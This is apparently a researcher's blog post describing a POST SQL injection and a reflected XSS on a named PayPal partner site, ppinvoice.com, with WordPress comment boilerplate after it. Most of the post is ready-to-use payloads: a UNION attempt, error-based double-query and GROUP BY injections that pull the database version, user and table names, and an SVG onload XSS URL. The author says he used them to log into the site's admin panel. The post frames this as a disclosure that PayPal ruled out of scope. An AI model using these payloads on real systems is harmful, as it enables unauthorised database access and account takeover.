Paypal Partner SQL Injection

One of the Paypal Partner websites http://ppinvoice.com/ was suffering from a POST SQL injection. Union injection was impossible in here.

LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

As we cannot continue with the above error, double query injection works perfect.

LoginForm[email]=1' and(select 1 from(select count(*),concat((select 
(select concat(0x7e,0x27,cast(version() as char), 0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and 1=1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
LoginForm[email]=1' or 1 GROUP BY concat_ws(' :: ',version(),
user(),database(),@@license,@@hostname,floor(rand(0)*2)) having min(0) or 
1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

However dumping the database was quite easy since there were no WAFs or any kind of filtering happening. Out of the tables let’s check out the admin table.

LoginForm[email]=1'  or (@:=1)||@ group by concat((select substr
(group_concat(' :: ',table_name),1,450) from information_schema.tables 
WHERE table_schema=database()),@:=@-1)having @||min(@:=0)%23&LoginForm
[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3


So Finally I was able to log into their admin panel 😉

That’s not all there is also a reflected XSS.
http://ppinvoice.com/index.php/faq/faqlist?id=4″><svg/onload=”prompt(‘Hello There’)”>

It states about Cisco too in the Copyright.

However I reported Paypal and they said it’s out of scope. Well, I recently saw another researcher who had found some issues in another Paypal Partner website running SILK software was accepted while mine was not. The issue seems to be in SILK software. It seems like they are a third party to Paypal. They are also a Magento Solution Provider according their webpage.

Advertisements

2 thoughts on “Paypal Partner SQL Injection

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s